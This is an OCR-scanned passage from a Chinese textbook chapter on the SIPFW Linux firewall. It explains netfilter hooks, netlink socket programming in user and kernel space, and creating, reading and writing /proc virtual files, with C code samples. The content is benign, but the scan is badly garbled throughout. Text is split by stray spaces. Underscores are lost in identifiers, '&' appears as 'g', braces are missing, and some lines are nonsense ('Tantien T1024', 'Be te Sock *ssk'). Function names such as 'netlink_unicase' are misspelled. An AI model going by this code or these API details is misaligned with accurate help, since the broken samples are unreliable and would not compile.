本 地 网 络 数据 


图 20.7 netfilet 的 5 个 钩子 


候 ， 可 以 查找 网 络 数据 上 的 内 容 在 不 同 的 链 上 进行 规则 的 查找 。 如 果 找 到 匹配 的 规则 ， 就 
进行 规则 指定 动作 的 处 理 。 


2. SIPFW 防火 墙 的 用 户 空间 和 内 核 空间 的 通信 方式 


上 述 的 内 容 是 防火 墙 的 内 核 层 实现 技术 架构 ， 而 防火 墙 要 能 与 用 户 交 互 ， 必 须 有 一 种 
合适 用 户 空间 和 内 核 空间 交互 的 方式 。 在 Linux 中 内 核 空 间 和 用 户 空间 进行 交互 的 方法 主 
要 有 ioctl0 方 法 、sysctl() 方 法 ， 以 及 网 络 的 方法 、PROC 方法 、 文 件 读 写 的 方法 等 。 早 期 
的 iptables 框架 采用 了 网 络 框架 中 的 setsockopt()/getsockopt() 的 方法 来 实现 用 户 空 间 与 内 核 
空间 的 通信 ， 现 在 iptables 的 通信 框架 采用 了 netlink() 方 法 。 

SIPFW 防火 墙 采用 netlink 框架 和 proc 编程 的 方法 实现 用 户 空间 和 内 核 空间 的 通信 。 
netlink 的 概念 和 proc 的 概念 在 后 面 章节 中 有 介绍 ， 这 里 介绍 两 种 方法 在 SIPFW 中 使 用 的 
侧重 点 。 

netlink 框架 用 于 实现 用 户 命令 行 的 交互 ， 即 用 户 的 命令 行 交 互 使 用 netlink 来 实现 , 将 
用 户 的 命令 设置 发 送 到 内 核 ， 并 将 内 核 的 响应 数据 发 送 给 用 户 。 

Proc 框架 用 于 提供 用 户 对 netlink 基本 情况 的 简单 信息 , 例如 默认 动作 、 防 火 墙 的 有 效 
和 失效 配置 、 过 滤 规 则 命中 的 简单 情况 等 。 

3. SIPFW 防火 墙 文件 的 内 核 操 作 

SIPFW 防火 墙 的 文件 操作 涉及 配置 文件 的 读 、 写 、 建 立 ， 规 则 文件 的 读 、 写 、 建 立 ， 
日 志文 件 建立 、 写 等 操作 。SIPFW 的 主要 动作 都 集中 在 内 核 空 间 ， 即 文件 的 操作 要 使 用 内 
核 空间 的 文件 函数 ， 内 核 空 间 的 文件 操作 函数 与 用 户 空间 的 操作 函数 不 同 ， 在 后 面 将 会 进 
行 简单 介绍 。 


20.3 ”使 用 netlink 进行 用 户 空间 和 内 核 空 间 数据 交互 


Linux 支持 很 多 的 高 级 网 络 特性 ， 例 如 防火 墙 、 队 列 质量 QoS、 类 别 和 过 滤 、 通 路 状 
态 、netlink 套 接 字 等 。netlink 用 于 在 用 户 空间 和 内 核 空间 传递 数据 ， 它 提供 了 内 核 /用 户 空 
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间 的 双向 通信 方法 。 第 一 部 分 介绍 netlink 套 接 字 的 用 户 空间 建立 和 使 用 。 第 二 部 分 介绍 如 
何在 内 核 中 进行 netlink 的 程序 设计 ， 以 及 网 络 数据 如 何在 内 核 中 进行 处 理 。 


20.3.1 netlink 的 用 户 空间 程序 设计 


netlink 包含 用 户 空间 的 标准 套 接 字 接口 和 用 于 构建 内 核 模 块 的 内 核 API。SIPFW 防火 
墙 使 用 netlink 进行 用 户 空间 和 内 核 空 间 的 通信 。 


1. netlink 套 接 字 


用 户 层 的 netlink 程序 设计 与 通用 的 套 接 字 编 程 一 致 ， 其 顺序 如 下 所 述 。 
口 socket0: 建立 netlink 套 接 字 。 

口 bind(): 将 netlink 套 接 字 与 netlink 地 址 类 型 进行 绑 定 。 

口 sendmsg(): 向 内 核 或 者 其 他 进程 发 送 消息 。 

口 recvmsg(): 从 内 核 或 者 其 他 进程 接收 消息 。 

口 close(): 关闭 netlink 套 接 字 。 

其 中 socket() 函 数 用 于 建立 netlink 类 型 的 套 接 字 。bind0 函 数 将 socket() 函 数 生成 的 套 
接 字 文 件 描述 符 与 一 个 netlink 类 型 的 地 址 结构 绑 定 到 一 起 。sendmsg() 函 数 由 用 户 空 间 向 内 
核 空 间 发 送 数 据 ，recevmsg0) 函 数 用 于 用 户 空间 接收 来 自 内 核 空间 的 数据 。 最 后 关闭 netlink 
网 络 套 接 字 。 


2. netlink 的 用 户 层 套 接 字 建 立 


建立 一 个 用 户 空 间 的 netlink 套 接 字 使 用 套 接 字 socket() 函 数 , 三 个 参数 的 原型 是 一 致 的 ， 
但 是 建立 netlink 套 接 字 需 要 输入 不 同 的 参数 ， 可 以 使 用 如 下 方式 建立 一 个 netlink 套 接 字 : 


int s = socket (AF NETLINK, SOCK RAW, NETLINK ROUTE); 


其 中 AF_NETLINK 为 协议 族 ， 套 接 字 的 类 型 为 SOCK_RAW,， 协议 类 型 为 系统 定义 的 
某 种 类 型 或 者 用 户 自 定义 的 类 型 。 

netlink 建立 套 接 字 的 时 候 ， 套 接 字 类 型 是 一 种 数据 包 套 接 字 类 型 的 服务 ， 可 以 为 
SOCK_ RAW 或 者 SOCK_DGRAM。 

网 络 协议 的 协议 可 以 为 如 下 几 个 类 型 。 

口 NETLINK_ ROUTE: 接收 路 由 更 新 并 且 可 以 用 于 修改 IPv4 路 由 表 、 网 络 路 由 、IP 
地 址 、 连 接 参数 、 邻 居 设 置 、 队 列 丢弃 、 负 载 类 型 和 数据 包 分 类 等 。 
NETLINK_FIREWALL: 接收 IPv4 防火 墙 发 送 的 数据 包 。 
NETLINK_ARPD: 用 于 用 户 空间 管理 arp 表 。 
NETLINK_ ROUTE6: 接收 和 发 送 IPv6 路 由 表 更 新 。 
NETLINK_TAPBASE...NETLINK_TAPBASE+15: 为 一 种 ethertap 设备 实例 ， 
ethertap 是 一 种 伪 网 络 通道 设备 ， 它 允许 用 户 空间 仿真 网 络 设备 。 
口 NETLINK_SKIP: 保留 用 于 ENskip 。 


3. netlink 的 套 接 字 绑 定 
对 于 netlink 的 每 一 个 协议 类 型 ， 最 多 支持 32 个 多 播 群 组 ， 每 一 个 多 播 的 群 组 占用 一 
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个 32 位 数 的 一 位 ， 例 如 某 一 个 netlink 协议 对 应 的 多 播 群 为 1， 另 一 个 为 j， 则 它们 组 成 的 
数值 1<<ill<<j 为 多 播 的 组 。 这 种 多 播 的 方法 在 多 个 相同 功能 的 进程 和 内 核 通 信 的 时 候 十 
分 有 用 , 用 户 和 内 核 之 间 的 通信 可 以 在 群 组 内 进行 , 可 以 减少 内 核 和 进程 之 间 的 系统 调用 。 
bindO 函 数 将 一 个 套 接 字 文 件 描述 符 和 地 址 结构 绑 定 在 一 起 。 对 于 netlink 类 型 的 绑 定 ， 
其 地 址 结构 为 如 下 形式 的 原型 结构 : 


struct sockaddr nl 


和 
sa family t nl family; /* AF_NETLINK 协议 族 */ 
unsigned short nl pad; J 
_u32 nl pid; /* 进程 的 ID 号 */ 
_u32 nl groups; /* 多 播 组 的 掩 码 */ 

} nladdr; 


在 使 用 bind0 函 数 的 时 候 ， 结 构 sockaddr_nl 的 成 员 nl_pid 是 当前 进程 的 pid， 例 如 : 


nl pid = getpid(); 


上 述 的 方法 是 用 进程 ID 填充 nl_pid 参数 ， 用 于 当前 进程 中 只 有 一 个 netlink 套 接 字 描 
述 符 的 情况 。 

在 某 些 情况 下 ， 一 个 进程 中 有 多 个 线程 使 用 多 个 不 同 的 netlink 套 接 字 文件 描述 符 ， 这 
个 时 候 就 需要 用 如 下 方法 填充 nl_pid: 

nl_pid = pthread self()<<16|getpid() 


用 这 种 方法 , 统一 进程 中 的 不 同 线程 之 间 可 以 有 自己 的 netlink 套 接 字 文 件 描述 符 。 实 
际 上 ， 在 同一 个 线程 内 部 可 以 建立 多 个 netlink 套 接 字 。 

如 果 应 用 程序 想 接收 某 个 群 组 中 的 多 播 数 据 消 息 ， 那 么 应 用 程序 可 以 在 成 员 变量 
nl_groups 中 将 感 兴趣 的 多 播 组 的 手 码 使 用 OR 运算 加 入 。 如 果 nl_groups 的 值 为 0, 应 用 程 
序 仅仅 接收 来 自 内 核 程 序 的 单 播 消 息 。 当 对 nl_addr 填充 完毕 后 ， 需 要 用 bind0 函 数 按照 如 
下 方式 进行 绑 定 : 


bind(s, (struct sockaddr*) gnladdr, sizeof (nladdr) ) 


4. netlink 的 消息 发 送 


可 以 使 用 sendmsg(O) 函 数 向 内 核 或 者 其 他 进程 发 送 消息 。 向 其 他 进程 发 送 消息 需要 填充 
目的 进程 的 sockaddr_nl 结构 ,这 种 情况 下 与 UDP 协议 的 sendmsg() 函 数 使 用 情况 相同 。 如 
果 疝 内 核发 送 消息 ， 则 结构 sockaddr_nl 中 的 成 员 nl_pid 和 nl_gourps 均 需 要 设置 为 0。 

如 果 消 息 是 一 个 单 播 ， 则 消息 的 目的 进程 是 目的 进程 的 PID， 并 填充 到 nl_pid， 同 时 
将 nl_groups 设置 为 0。 

如 果 消 息 是 一 个 多 播 消 息 ， 则 nl_groups 需要 设置 多 播 手 码 位 。 然 后 将 sockaddr nl 结 
构 填 充 到 消息 结构 中 : 


struct msghdr mhdr; /* 消 息 头 */ 
mhdr .msg_name = (void*) gnladdr; /* 消 息 名 称 指 向 netlink 的 地 址 结构 */ 
mhdr.msg_namelen = sizeof (nladdr); /# 消 息 名 称 的 长 度 为 netlink 地 址 的 大 小 */ 
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在 netlink 套 接 字 中 有 自己 的 消息 头 ， 在 实际 的 实现 过 程 中 是 将 netlink 自己 的 消息 头 
部 包含 在 通用 消息 中 , 在 通用 消息 的 基础 上 构造 netlink 的 自由 消息 。netlink 规定 每 个 消息 
中 必须 含有 netlink 私有 消息 ， 其 私有 消息 的 结构 原型 如 下 : 


struct nlmsghdr 


_u32 nlmsg len; /* 消 息 长 度 */ 

_ul6 nlmsg type; /* 消 息 类 型 */ 

_ul6 nlmsg flags; /* 附 加 信息 */ 

_u32 nlmsg seq; /* 序 列 号 */ 

_u32 nlmsg pid; /# 发 送 方 的 进程 TD*/ 
}nlmh; 


nlmsg_len 表示 消息 的 长 度 , 它 包 括 消息 头 部 ,nlmsg_type 仅 用 于 应 用 程序 , 对 于 netlink 
核心 来 说 是 透明 的 。nlmsg_flags 给 出 额外 的 控制 信息 。 nlmsg_seq 和 nlmsg_pid 是 应 用 程序 
用 于 跟踪 消息 使 用 ， 对 于 netlink 核心 是 透明 的 。 

netlink 的 消息 包含 nlImsghdr 和 消息 的 负载 。 例 如 : 


struct iovec vec; /* 向 量 */ 

iov.iov base = (void*)nlmh; /* 向 量 的 数据 指针 为 netlink 消息 的 头 部 */ 
iov.iov len = nlmh->nlmsg len; /* 向 量 长 度 为 netlink 消息 的 长 度 */ 
msg.msg_iov = &vec; /* 消 息 的 向 量 #/ 

msg.msg_iovlen = 1; /# 消 息 向 量 的 个 数 */ 


消息 填充 完毕 后 就 可 以 发 送 消 息 了 : 
sendmsg(s, &msg, 0); 
5. netlink 的 消息 接收 


recvmsg() 函 数 用 于 接收 内 核 和 其 他 应 用 程序 发 送 的 数据 。 接 收 消息 的 缓冲 区 要 足够 包 
含 netlink 消息 的 头 部 和 消息 的 负载 。 接 收 消息 的 代码 如 下 : 


struct sockaddr nl nladdr; /*netlink 地 址 */ 

struct msghdr msgh; /* 消 息 头 */ 

struct nlmsghdr &nlmh; /*netlink 消息 头 */ 

struct iovec iov; /* 向 量 */ 

msg.msg name = (void*) gnladdr; /* 消 息 名 称 指向 netlink 地 址 */ 
msg.msg_namelen = sizeof (nladdr); /* 消 息 名 称 长 度 为 地 址 结构 长 度 */ 
msg.msg_iov = &iov; /* 消 息 的 向 量 #/ 

msg.msg iovlen = 1; /* 消 息 的 向 量 个 数 */ 

iov.iov base = (void*) gnlmh; /* 向 量 的 数据 部 分 为 netlink 消息 */ 
iov.iov len = MAX NL MSG LEN; /# 向 量 长 度 */ 

recvmsg(s, &msg, 0); /* 接 收 消息 */ 


当 正 确 地 接收 到 消息 之 后 ， 指 针 nlmh 指向 刚刚 接收 netlink 消息 的 头 部 。nladdr 中 保 
存 的 为 接收 到 消息 的 目的 地 址 ， 包 含 着 进程 的 pid 和 多 播 群 组 。 宏 NLMSG_DATA(nlmh) 
返回 指向 负载 部 分 的 指针 ， 在 头 文件 <netlink.h> 中 定义 。 
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20.3.2 ”netlink 的 内 核 空 间 API 


内 核 空间 的 netlink API 与 应 用 程序 之 间 的 API 之 间 有 很 多 的 不 同 ，netlink 内 核 API 
在 文件 net/core/af_netlink.c 中 实现 。 内 核 netlink API 可 以 用 于 访问 内 核 模块 的 netlink 套 接 
字 ， 并 和 用 户 空间 的 应 用 程序 进行 通信 。 如 果 想 添加 用 户 自 己 定义 的 协议 类 型 ， 需 要 自己 
增加 协议 类 型 ， 如 定义 如 下 的 协议 类 型 : 


#define NETLINK TEST 17 


1. netlink 的 内 核 套 接 字 建 立 


在 用 户 层 ，socket(0) 函 数 用 于 建立 netlink 套 接 字 ， 其 中 的 协议 类 型 应 该 也 为 
NETLINK_TEST。 内 核 空间 建立 此 套 接 字 的 函数 为 : 
struct sock * 


netlink kernel createl(int unit, 
void (*input) (struct sock *sk, int len)); 


参数 unit， 是 netlink 协议 类 型 ， 例 如 为 NETLINK_TEST， 函 数 指针 input 是 一 个 接收 
到 用 户 空间 的 消息 后 的 回调 函数 ， 是 netlink 内 核 套 接 字 的 主要 处 理 函数 。 

建立 netlink 套 接 字 函数 在 成 功 的 时 候 , 返回 一 个 structure sock 指针 类 型 的 值 , 之 后 可 
以 用 这 个 值 对 netlink 套 接 字 进 行 处 理 ， 当 返回 值 为 NULL 的 时 候 ， 套 接 字 建立 失败 了 ， 需 
要 进行 容错 的 处 理 ， 通 常 进行 资源 的 释放 等 。 


2. netlink 的 应 用 层 数据 接收 


当 内 核 使 用 netlink_kernel_create() 函 数 建立 一 个 NETLINK_TEST 类 型 的 协议 之 后 , 当 
用 户 空间 向 内 核 空 间 通过 之 前 的 netlink 套 接 字 发 送 消息 的 时 候 ，net _ kernel_create() 函 数 注 
册 的 回调 函数 inputO 会 被 调用 ， 下 面 是 一 个 input() 函 数 的 实现 代码 : 


void input (struct sock *sk, int len) 
{ 

struct sk buff *skb; 

struct nlmsghdr *nlh = NULL; 

u8 *payload = NULL; 


while ((skb = skb dequeue (&sk->receive queue))!= NULL) 


/* 从 内 核 接收 链 中 摘除 网 络 数据 */ 
{ 
nlh = (struct nlmsghdr *) skb->data;/*Netlink 消息 的 头 部 */ 
payload = NLMSG DATA (nlh); /* 获 得 其 中 的 负载 数据 */ 


} 


当 应 用 层 的 进程 通过 sendmsg() 函 数 发 送 数 据 的 时 候 , 如 果 inputO) 函 数 的 处 理 速 度 足 够 
快 ， 就 不 会 对 系统 造成 影响 。 当 input0 函 数 的 处 理 过 程 占用 很 长 时 间 ， 需 要 将 处 理 的 代码 
从 inputO 函 数 中 移 除 ， 放 到 别 的 地 方 进行 处 理 ， 防 止 系 统 调用 在 此 处 阻塞 ， 别 的 系统 不 能 
进行 调用 。 
可 以 使 用 内 核 线程 来 处 理 上 述 的 功能 ， 在 此 内 核 线 程 中 使 用 skb=skb recv 
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datagrm(nl_sk) 函 数 来 接收 客户 端 发 送 的 数据 ， 接 收 到 的 数据 保存 在 skb->data 中 。 当 使 用 
netlink kernel_create() 函 数 建立 的 套 接 字 nl_sk 没有 数据 时 ， 内 核 处 理 线 程 进入 睡眠 状态 ， 
有 数据 到 来 的 时 候 需要 将 内 核 处 理 线程 唤醒 , 进行 接收 和 处 理 线 程 的 工作 .所 以 在 inputO) 
函数 中 ， 需 要 将 内 核 线程 唤醒 。 可 以 使 用 如 下 的 代码 实现 : 


void input (struct sock *sk, int len) 


{ 


于 


wake up interruptible(sk->sleep); 
} 


3. netlink 的 内 核 数 据 发 送 


netlink 在 内 核 中 发 送 数 据 与 应 用 程序 发 送 数 据 一 样 , 需要 设置 netlink 的 源 地 址 和 目的 
netlink 地 址 。 例 如 ， 需 要 发 送 的 netlink 消息 数据 在 结构 struct sk_buffxskb 中 ， 则 本 地 的 地 
址 可 以 使 用 如 下 设置 : 

NETLINK CB(skb) .groups = local groups; 

NETLINK CB(skb).pid = 0; /* from kernel */ 

netlink 的 目的 地 址 的 设置 为 如 下 的 代码 : 

NETLINK_CB (skb) .dst groups = dst _ groups; 

NETLINK CB(skb) .dst pid = dst pid; 

上 述 消息 没有 存在 skb->data 中 ， 而 是 存放 在 netlink 协议 的 套 接 字 缓冲 区 控制 块 
skb 中 。 

发 送 一 个 单 播 消息 ， 使 用 netlink_unicase() 函 数 ， 其 原型 如 下 : 

int 

Be te Sock *ssk, struct sk buff 

*Sskb, u32 pid, int nonblock); 

其 中 的 参数 ssk 由 netlink kernel _create() 函 数 返 回 ，skb->data 指向 需要 发 送 的 netlink 
消息 ，pid 是 应 用 层 接收 数据 的 pid，nonblock 用 于 设置 当 接收 缓冲 区 不 可 用 的 时 候 是 阻塞 
等 待 直到 缓冲 区 可 用 ， 还 是 直接 返回 失败 。 

发 送 多 播 消 息 使 用 netlink_broadcast() 函 数 ， 它 可 以 向 pid 指定 的 应 用 程序 或 者 goups 
指定 的 群发 送 消息 。 原 型 定义 如 下 : 

void 


netlink broadcast(struct sock *ssk, struct sk buff 
*skb, u32 pid, u32 group, int allocation); 


其 中 的 参数 group 是 OR 运算 组 成 的 接收 数据 的 多 播 群 ID 号 ,allocation 是 内 核 内 存 申 
请 类 型 ， 例 如 GFP_ATOMIC 在 终端 上 下 文中 使 用 ，GFP_KERNEL 在 其 他 状态 下 使 用 。 要 
申请 内 存 的 原因 是 这 个 函数 在 发 送 消息 数据 的 时 候 可 能 需要 申请 多 个 套 接 字 缓冲 区 ， 用 于 
复制 多 播 消 息 。 


4. netlink 的 套 接 字 关 闭 
关闭 netlink 套 接 字 ， 使 用 sock_release() 函 数 来 进行 。 主 要 进行 内 存 等 资源 的 释放 ， 将 
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一 些 指针 进行 重 置 的 操作 。 函 数 的 原型 如 下 : 


void sock _ release (struct socket *Sock) ; 


netlink_kernel_create() 函 数 建 立成 功 套 接 字 的 返回 值 为 struct sock，sock release() 函 数 
释放 套 接 字 时 传 入 的 参数 是 struct socket 类 型 ， 类 型 structure socket 是 struct sock 的 一 个 成 
员 ， 所 以 可 以 使 用 如 下 方式 来 释放 套 接 字 : 


sock release(nl sk->socket); 


20.4 使 用 proc 进行 内 存 数据 用 户 空 间 映 射 


Linux 中 的 proc 文件 系统 是 一 种 虚拟 文件 系统 ， 通 过 这 个 文件 系统 可 以 实现 内 核 空间 
和 用 户 空间 之 间 的 通信 。 在 proc 虚拟 文件 系统 中 , 通过 对 文件 的 读 写 来 实现 用 户 空间 和 内 
核 空间 的 通信 ， 与 普通 的 文件 不 同 ，/proc 目录 下 的 虚拟 文件 的 内 容 是 动态 创建 的 。 


20.4.1 proc 虚拟 文件 系统 的 结构 


对 proc 虚拟 文件 系统 进行 操作 要 先 了 解 它 的 核心 结构 , proc 文件 系统 的 核心 数据 结构 
是 structure proc_dir_entry， 它 用 来 表示 一 个 虚拟 文件 系统 的 文件 。 原 型 定义 如 下 : 


struct proc dir entry { 


const char *name; /* 虚 拟 文 件 的 名 称 */ 
mode 七 mode; /* 文 件 的 模式 权限 */ 
uid t uid; /* 文 件 的 用 户 ID*/ 

gid 七 gid; /* 文 件 的 组 ID*/ 
struct inode operations *proc_iops; /*inode 节点 操作 函数 */ 
struct file operations *proc_fops; /* 文 件 操作 函数 */ 
struct proc dir entry *parent; /* 父 目录 */ 

read proc t *read proc; /*proc 的 读 函数 */ 
write proc t *#write procs; /*proc 的 写 函数 */ 
void *data; /* 私 有 数据 指针 */ 


atomic t count; /* 使 用 计数 */ 


口 名 称 name 应 该 选取 一 个 有 意义 的 名 字 ， 并且 不 能 包含 任何 特殊 字符 和 空 字符 ， 
为 proc 文件 系统 通常 通过 命令 行 的 shell 进入 ， 那 样 会 造成 从 控制 台 进 入 困难 。 

口 权限 mode 的 设置 需要 仔细 考虑 ， 如 果 不 恰当 的 设置 和 写 权 限 ， 可 能 造成 系统 的 

口 参数 proc_fops 并 不 是 一 个 全 功能 的 文件 系统 函数 , 它 仅 仅 限定 于 读 操 作 和 写 操作 。 

口 参数 read proc 和 write proc 是 proc 文件 系统 的 读 写 界 面 ， 要 由 用 户 实 现 ,用 户 要 
小 心 编 写 这 两 个 函数 ， 以 保证 能 够 进行 安全 地 读 写 。 

口 参数 data 是 用 户 的 私有 数据 指针 ， 可 以 将 不 方便 传递 的 参数 通过 data 指针 进行 


读 写 。 
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20.4.2 创建 proc 虚拟 文件 


创建 proc 虚拟 文件 的 函数 有 创建 目录 的 函数 proc_mkdir() 和 创建 文件 的 函数 
create_ proc_entry()。 创 建 目录 的 proc_ mkdir0 函 数 原型 如 下 : 
extern struct proc dir entry *proc mkdir( 


const char *dir_name, 
struct proc dir entry *parent); 


proc_mkdir() 函 数 在 parent 下 创建 一 个 名 称 为 dir name 指向 字符 串 的 目录 。 当 创建 成 
功 的 时 候 ， 返 回 值 为 指向 结构 struct proc_dir_entry 的 指针 ， 之 后 可 以 使 用 这 个 指针 进行 处 
理 ， 失 败 的 时 候 返 回 NULL。 注 意 ， 对 于 parent 应 该 按照 程序 的 特性 选择 一 个 类 型 ， 不 要 
放 在 根 目 录 proc_ root 下 。 


extern struct proc dir entry *create proc entry( 


const char *name, /* 创 建文 件 的 名 称 */ 
mode 七 mode, /* 文 件 的 属 主 */ 
struct proc dir entry *parent); /* 文 件 的 父 目录 */ 


函数 create_proc_entry() 在 /proc 文件 系统 中 创建 一 个 虚拟 文件 ,文件 名 为 name 指定 的 
字符 串 ， 文件 的 权限 由 参数 mode 设置 ， 与 通用 文件 的 权限 一 致 ， 而 parent 参数 说 明 此 文 
件 的 位 置 ， 当 为 &proc_root 的 时 候 其 目录 为 /proc 的 根 目录 下 。 

函数 创建 成 功 的 时 候 返 回 一 个 指向 结构 proc_dir_entry 的 指针 ， 如 果 返 回 值 为 NULL， 
则 说 明 创 建文 件 时 发 生 了 错误 。 如 果 成 功 返 回 ， 之 后 对 虚拟 文件 的 操作 可 以 通过 这 个 返回 
值 进行 。 

对 于 parent 参数 , 函数 创建 成 功 后 的 虚拟 文件 集成 了 其 父 目 录 的 属性 。 预 定义 的 struct 
proc_dir_entry 变量 有 proc_root、proc_root driver、proc_root fs、proc_net 和 proc_bus， 如 
表 20.2 所 示 。 

表 20.2 预定 义 的 proc 变量 
预定 义 值 路 径 预定 义 值 路 径 
proc_ root /proc proc_net /proc/net 
proc_root_driver /proc/drivers proc_bus /proc/bus 
proc_ root fs /proc/fs 

如 下 的 代码 先 在 /proc/net 下 创建 了 sipfw 目录 ， 然 后 在 sipfw 目录 下 创建 information 
文件 ， 文 件 的 属性 为 0644， 可 读 写 。 

struct proc dir entry *sipfw proc dir; /* 防 火 墙 的 proc 的 目录 */ 

static struct proc dir entry *sipfw_proc info; /* 防 火 墙 的 信息 */ 


Sipfw proc dir = proc mkdir("sipfw", proc net); 


/* 在 /proc/net 下 建立 sipfw 目录 */ 


Sipfw proc info = create proc entry( /* 信 息 项 */ 
"information", 
0644, 


sipfw proc dir ); 
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20.4.3 ”删除 proc 虚拟 文件 


虚拟 文件 proc 的 释放 函数 为 remove_proc_entry()， 函 数 的 原型 如 下 所 示 。 其 中 的 参数 
name 为 要 删除 文件 的 名 称 ，parent 为 proc 文件 的 父 目 录 。 


extern void *remove proc entry( 


const char *name, /* 要 删除 文件 的 名 称 */ 
struct proc dir entry *parent); /* 文 件 的 父 目 录 */ 


在 创建 proc 虚拟 文件 之 后 , 一 个 比较 大 的 错误 是 在 模块 退出 的 时 候 忘 记 了 释放 创建 的 
文件 ， 在 使 用 ls 列表 查询 的 时 候 会 造成 段 错误 ， 因 此 创建 函数 create_proc_entry() 和 
remove_proc_entry() 函 数 要 配对 使 用 。 此 函数 中 的 参数 与 创建 虚拟 文件 时 的 参数 要 完全 一 
致 ， 包 括 名 称 和 父 目 录 。 


20.4.4 proc 文件 的 写 函数 


proc 文件 系统 的 读 写 通过 用 户 实现 的 读 写 回调 函数 来 实现 ， 其 中 的 写 函数 表示 用 户 空 
间 向 内 核 空间 写 入 数据 ， 此 时 如 何 处 理 用 户 空 间 的 数据 由 实现 的 函数 决定 。 原 型 如 下 : 
typedef int (write proc t) (struct file *file, 
const char _user *buffer, 
unsigned long count, 
void *data); 

口 参数 file 是 一 个 已 经 打开 的 文件 结构 ， 通 常 忽 略 这 个 变量 。 

口 参数 buffer 是 用 户 传递 过 来 的 数据 指针 ， 这 实际 上 是 一 个 用 户 指针 ， 在 内 核 空间 
不 能 直接 使 用 这 个 参数 ， 需 要 使 用 例如 copy_from_user() 之 类 的 函数 将 用 户 空 间 的 
数据 复制 到 内 核 空间 来 。 

口 参数 count 是 缓冲 区 中 数据 的 数量 。 

口 参数 data 是 一 个 指向 私有 数据 的 指针 。 

例如 在 如 下 代码 中 ， 将 前 面 建立 成 功 的 文件 系统 指针 的 私有 数据 指针 指向 一 块 用 户 申 

请 的 内 存 ， 然 后 挂 接 写 入 的 函数 。 写 入 函数 在 用 户 复 制 数 据 之 前 先 判 断 内 存 是 否 足 够 ， 妇 
果 不 够 ， 仪 复制 安全 数量 的 数据 。 

char * sipfw proc data = (char *)vmalloc( 1024 ); 

/* 建 立 一 个 1024 字 节 的 内 存 空间 */ 

Sipfw proc info->data = (void*) sipfw proc data; 

/* 将 data 私有 区 域 指向 申请 的 空间 */ 
sipfw proc info->write proc = sipfw proc write; /* 挂 载 函 数 */ 

int sipfw write proc(struct file *file, 

const char _ user *buffer, 


unsigned long count, 
void *data) 


int len = count; /* 复 制 数量 初始 化 为 用 户 数据 的 长 度 */ 
if(len > 1024) /* 用 户 数据 大 于 缓冲 区 的 大 小 */ 

len = 1024; /* 复 制 长 度 为 缓冲 区 的 长 度 */ 
copy_from user(data, buffer, len); /* 从 用 户 空间 复制 数据 */ 


return 0; 


“fs 


> 
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} 


Linux 提供 了 一 组 API 在 用 户 空间 和 内 核 空 间 之 间 移 动 数 据 。 对 于 write_proc 的 情况 
来 说 ， 使 用 了 copy_from_user() 函 数 来 维护 用 户 空间 的 数据 。 


20.4.5 ”proc 文件 的 读 函 数 


当 用 户 空间 的 程序 读 取 创 建 的 proc 文件 时 ， 内 核 会 分 配给 proc 读 取 程 序 一 页 大 小 的 
内 存 空间 ， 即 PAGE_SIZE 大 小 ，proc 驱动 程序 会 自动 将 这 块 空间 中 的 数据 复制 到 用 户 空 
间 。proc 驱动 程序 分 配 的 这 块 空间 会 通过 注册 的 proc_read() 回 调 函 数 传 入 。 这 个 函数 的 原 
型 如 下 : 
int proc read!( char *page, 
char **start, 
off t offset, 
int count, 
int *eof, 
void *data ); 


口 参数 page 为 proc 驱动 程序 传 入 的 分 配 的 内 核 空间 , 将 需要 传递 给 用 户 的 数据 复制 

到 这 个 缓冲 区 的 地 址 。 这 个 缓冲 区 是 内 核 空间 的 缓冲 区 ， 不 需要 用 户 调用 ， 例 如 

copy_to_use() 的 类 似 函 数 。 系 统 会 自动 将 page 中 的 数据 复制 给 用 户 。 

参数 start 是 在 此 缓冲 区 中 需要 复制 给 用 户 数据 的 起 始 地 址 。 

参数 offset 表示 用 户 打算 读 取 文 件 时 的 偏 移 地 址 ， 从 这 个 地 址 开始 读 取 。 

参数 count 是 用 户 请 求 读 取 的 字 节 数量 。 

参数 eof 是 一 个 整 型 的 指针 ， 当 驱动 程序 的 数据 发 送 完毕 时 ,将 这 个 值 设 置 为 结束 

发 送 给 用 户 ， 用 户 可 以 根据 这 个 值 判 断 数据 是 否 结束 。 

口 参数 data 是 私有 数据 的 指针 。 

全 注意 参数 start、offset 是 对 大 于 一 页 的 数据 进行 处 理 的 时 候 使 用 ， 或 者 多 次 同时 传送 
同一 块 内 存 数据 的 时 候 使 用 ， 用 于 记录 上 次 发 送 数 据 的 位 置 。 系 统 会 认为 *start 
指向 的 位 置 和 offset 设置 的 偏 移 位 置 是 一 致 的 。 


下 面 的 代码 为 从 内 核 向 用 户 空 间 复制 数据 的 过 程 ， 对 于 用 户 请 求 的 从 offset 开始 的 
count 个 数据 , 内 核 不 管 数据 是 否 之 前 用 户 已 经 获得 过 , 全 部 复制 到 缓冲 区 page 中 。 当 page 
中 的 数据 长 度 小 于 用 户 请 求 的 数据 偏 移 量 时 ， 告 诉 用 户 没 有 数据 ， 如 果 用 户 请 求 的 偏 移 位 
置 在 page 中 ， 则 更 新 *start 的 值 为 偏 移 量 位 置 (当然 这 对 于 用 户 来 说 没有 什么 关系 ， 只 是 
为 了 便于 系统 查找 page 中 发 送 给 用 户 的 数据 )， 并 将 复制 给 用 户 的 长 度 设置 为 总 数据 长 度 
减 去 偏 移 量 。 最 后 根据 打算 复制 给 用 户 的 数据 长 度 len 和 用 户 数据 缓冲 区 count 之 间 找 一 个 
小 的 值 作为 复制 给 用 户 的 数据 长 度 。 


int sipfw proc read(char *page, 


Char **start, 
off t offsets 
int count, 
int *eof, 
void *data ) 
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Tantien T1024 /* 设 置 从 data 向 page 复制 的 数量 为 1024*/ 
if(1024>PAGE SIZE) len = PAGE SIZE;  /* 按 照 小 的 数量 进行 设置 复制 量 #/ 
memcpy (page, data, len); /* 复 制 到 page 数据 */ 
if (offset >= len) /* 用 户 偏 移 量 比 复制 的 数据 位 置 长 */ 
{ 

*start = page; /* 更 新 *start, 指 向 page 开头 */ 

*eof = 1; /* 结 束 了 */ 

return 0; /* 返 回 */ 
} 
/* 设 置 缓冲 区 偏 移 量 */ 
*start = page + offset; /**start 指向 用 户 定义 的 偏 移 指针 */ 
len -= offset; /* 发 送 给 用 户 的 数量 为 总 数据 减 去 偏 移 量 */ 
if(len > count) /* 剩 余 的 数据 仍然 比 用 户 的 缓冲 区 大 */ 

len = count; /* 修 改 复制 给 用 户 的 数据 量 为 用 户 缓冲 区 大 小 */ 
return len; /* 返 回复 制 给 用 户 的 数据 长 度 */ 


20.$ 内核 空间 的 文件 操作 函数 


在 SIPFW 防火 墙 中 要 对 文件 在 内 核 空间 进行 读 写 , 在 内 核 中 操作 文件 的 函数 与 用 户 间 
